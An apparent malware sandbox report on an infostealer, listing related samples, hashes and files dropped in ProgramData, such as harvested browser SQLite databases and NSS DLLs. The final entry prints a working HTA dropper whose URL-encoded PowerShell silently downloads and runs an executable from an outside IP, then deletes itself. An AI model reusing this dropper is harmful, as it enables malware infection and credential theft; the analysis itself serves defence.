                                                                                                                                                                                                                        i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                          glpEv3POe7.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                            gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                              iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                                                  random.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                        5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                          DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                              glpEv3POe7.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                  iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                    C:\ProgramData\BAAAKJDAAFBAAKEBAAKF

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\DBFBFBGDBKJJKFIEHJDBAFIECG

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\GDBFBFCBFBKECAAKJKFB

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\HCBGDGCAAKJEBFIDBAAA

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10307
                                                                                                                                                                                                                                                    Entropy (8bit):5.499938759131961
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:nAngRHBE1ibqp67PQ77QCVUgaXQ6iKK/4z3NBw8D8kSl:njAiQPQCVUJi/8fw9k0
                                                                                                                                                                                                                                                    MD5:3689683C20BBA57B8844A42FF5EBD9C1
                                                                                                                                                                                                                                                    SHA1:6659237CF9F919DB356FF565168266BF32315149
                                                                                                                                                                                                                                                    SHA-256:288DB1D8AEA9CDA0DE68FDD2D6A816FA48CD8A7E2427B7159D4026666553FBC2
                                                                                                                                                                                                                                                    SHA-512:75A10281DCD2D8342EC7876A1A5D0FE05076CD55AC20B2664026264DA5085DC905B3678EED3EF691BDE5F54531D3734E48D7A330C5645DBE0D99C1C456722A27
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "4cbb0eca-22b0-45bf-8c7b-17c3580947ca");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696503498);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696503523);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                    C:\ProgramData\IECGHJKK

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                    Entropy (8bit):1.1366744760037832
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cZ/Q4:MnlyfnGtxnfVuSVumEHZY4
                                                                                                                                                                                                                                                    MD5:403AF73130A55F1DF5D5D597717A386C
                                                                                                                                                                                                                                                    SHA1:AA0262EE3F7188D59D5859AF240B725AA9252212
                                                                                                                                                                                                                                                    SHA-256:A225C7166B6841D04F34589DB373472CA34525F88A644B5903733563372642AD
                                                                                                                                                                                                                                                    SHA-512:B70388D614814369D8DB9E4F3F20FB2F16EED5A65893DC7A8872E8FC462A7338F929A0777B4D18B77E1F4A6864CDA790ABD91116C9D1483DFFB64173699EEAEF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\JDAFIEHI

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                    Entropy (8bit):1.1209935793793442
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                                                                                                                                                                    MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                                                                                                                                                                    SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                                                                                                                                                                    SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                                                                                                                                                                    SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\KECFIDGCBFBAKEBFBKFBFBAFII

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                                    Entropy (8bit):0.03779668081370459
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZh1B++NbBl3D56+9H9HI:58r54w0VW3xWZhW+Ff3AW9
                                                                                                                                                                                                                                                    MD5:F5A3FAA39A2FDA10356E1889BC81EA55
                                                                                                                                                                                                                                                    SHA1:FD4D7CF58C33C8583E45D88A2F89B8F66770644B
                                                                                                                                                                                                                                                    SHA-256:55BDD67E95C3B441AE02D26939E484E14B14550F5A273F3E35ADE569ABA8FAF9
                                                                                                                                                                                                                                                    SHA-512:28766C6C4FCB65CF9B436ED51708FABF3E2D8F8B3344F80B64A93994EE170DBB25025DBDB164A22636C1354139215A8B4181AC35D9E98A9950E9C1ECF1473D7F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                    • Filename: 5EfYBe3nch.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 8WFJ38EJo5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: w22319us3M.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 5uVReRlvME.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: DRWgoZo325.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: i8Vwc7iOaG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: glpEv3POe7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: gYjK72gL17.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: iUKUR1nUyD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                    • Filename: 5EfYBe3nch.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 8WFJ38EJo5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: w22319us3M.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 5uVReRlvME.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: DRWgoZo325.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: i8Vwc7iOaG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: glpEv3POe7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: gYjK72gL17.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: iUKUR1nUyD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Temp\.gif

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\.gif, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Temp\.hta (copy)

